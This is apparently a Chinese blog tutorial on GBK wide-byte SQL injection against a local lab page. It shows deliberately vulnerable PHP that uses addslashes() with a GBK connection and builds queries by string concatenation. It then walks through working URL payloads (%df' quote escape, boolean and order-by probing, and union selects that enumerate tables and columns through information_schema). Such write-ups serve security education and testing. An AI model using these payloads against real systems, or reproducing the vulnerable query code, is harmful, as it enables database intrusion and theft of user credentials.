SQL注入之宽字节注入攻击

梦里梦外; 2022-12-08 05:52 213阅读 0赞

**目录**

1 宽字节注入代码分析

2 数据库展示

3 注入过程

--------------------

# 1 宽字节注入代码分析 #

在宽字节注入页面中，程序获取GET参数ID,并对参数ID使用addslashes()转义，然后拼接到SQL语句中，进行查询，代码如下。

<?php
    
    $conn = mysql_connect('localhost', 'root', 'qwer') or die('bad!');
    mysql_select_db('security', $conn) OR emMsg("数据库连接失败");
    mysql_query("SET NAMES 'gbk'",$conn);
    
    $id = addslashes($_GET['id']);
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql, $conn) or die(mysql_error()); 
    $row = mysql_fetch_array($result);
    
    	if($row)
    	{
      	echo $row['username'] . $row['password'];
      	}
    	else 
    	{
    	print_r(mysql_error());
    	}      
    
    ?>
    </font> 
    <?php
    
    echo "<br>The Query String is : ".$sql ."<br>";
    
    ?>

当访问id=1'时，执行的SQL语句为:

SELECT * FROM users WHERE id='1\''

可以看到单引号被转义符"\\” 转义，所以在一般情况下，是无法注入的，但由于在数据库查询前执行了SET NAMES' GBK'，将编码设置为宽字节GBK,所以此处存在宽字节注入漏洞。  
在PHP中，通过iconv () 进行编码转换时，也可能存在宽字符注入漏洞。

# 2 数据库展示 #

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70][]

# 3 注入过程 #

访问id=1',页面的返回结果如图所示，程序并没有报错，反而多了一个转义符(反斜杠\\)

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 1][] 单引号被转义

--------------------

从返回的结果可以看出，参数id=1在数据库查询时是被单引号包围的。当传入id=1' 时，传入的单引号又被转义符(反斜线)转义，导致参数ID无法逃逸单引号的包围，所以在一般情况下，此处是不存在SQL注入漏洞的。不过有一个特例， 就是当数据库的编码为GBK时，可以使用宽字节注入，宽字节的格式是在地址后先加一个%df，再加单引号，因为反斜杠的编码为%5c,而在GBK编码中，%df%5c是繁体  
字"連"，所以这时，单引号成功逃逸，报出MySQL数据库的错误，如图所示。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 2][]

--------------------

由于输入的参数id=1'，导致SQL语句多了一个单引号，所以需要使用注释符来注释程序自身的单引号。访问id=1%df'%23,页面返回的结果如图所示，可以看到，SQL语句已经符合语法规范。  
![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 3][]

--------------------

使用and 1=1和and 1=2进一步判断注入，访问 **id=1%df' and 1=1%23** 和 **id=1%df' and 1=2%23**，返回结果如下两图所示。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 4][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 5][]

当and 1= 1程序返回正常时，and 1= 2程序返回错误，所以判断该参数ID存在SQL注入漏洞

接着使用order by查询数据库表的字段数量，最后得知字段数为3，如下所示。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 6][] order by 3没问题

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 7][] order by 4出问题啦

--------------------

因为页面直接显示了数据库中的内容，所以可以使用Union查询。与Union注入一样，此时的Union语句是union select 1, 2, 3，为了让页面返回Union查询的结果，需要把ID的值改为负数，结果如图所示。  
![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 8][]

--------------------

于是后面就是正常的union注入了。尝试在页面中2的位置查询当前数据库的库名(database () )，语句为:

id=-1%df' union select 1, user(),3%23

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 9][]  
返回的结果如上图所示。

--------------------

查询数据库的表名时，一把使用如下语句。

select table_name from information_schema.tables where table_schema='security' limit 0,1

但是此时，由于单引号被转义，会自动多出反斜杠，导致SQL语句出错，所以此处需要利用另一种方法：嵌套查询。就是在一个查询语句中， 再添加一个查询语句，下列就是更改后的查询数据库表名的语句。

select table_name from information_schema.tables where table_schema= (select databse()) limit0,1

可以看到，原本的table\_schema='security'变成了table\_schema=(select database())，因为select database () 的结果就是'security'，这就是嵌套查询，结果如下图所示。

id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database())limit 0,1),3%23

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 10][]

从返回结果可以看到，数据库的第一个表名是emails, 如果想查询后面的表名，还需修改limit后的数字，这里不再重复。使用以下语句尝试查询emails表里的字段。

--------------------

id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1)limit 0,1),3%23

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 11][] 这里使用了三层嵌套，第一层是table\_ schema,它代表库名的嵌套，第二层和第三层是table\_ name的嵌套。我们可以看到语句中有两个limit，前一个limit控制表名的顺序，后一个则控制字段名的顺序。如这里查询的不是emails表，而是users表，则需要更改limit的值。如上图所示，后面的操作如Union注入所示，这里不再重复。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70]: /images/20221123/b7a618d9336447e7ba2cfc87e97a555b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 1]: /images/20221123/3d3c1ddc417e41c7937a1c1bf1ac290f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 2]: /images/20221123/9f8e7af89bfd46b9a84e8c7866b166b0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 3]: /images/20221123/8d874f02af0240c8966303580fa7f55d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 4]: /images/20221123/2f21d56973f84bd0b1480623a88e9677.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 5]: /images/20221123/2870cfcfb93443b883db147fd9bb7989.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 6]: /images/20221123/4668daf89bac4b79b45f11e9fd4f2b96.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 7]: /images/20221123/e4511a0ec1c64d1e9b8e17474c503e86.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 8]: /images/20221123/155e54c966954faeabc9a569aa8f7126.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 9]: /images/20221123/7a1118614b794b4ab8c746d5471fa767.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 10]: /images/20221123/77b51d2c7b664c128c3604a164e55296.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RyaWZ0ZXJfR2FsYXh5_size_16_color_FFFFFF_t_70 11]: /images/20221123/e54a4fc9521141b2a2e5fb770d7dcf43.png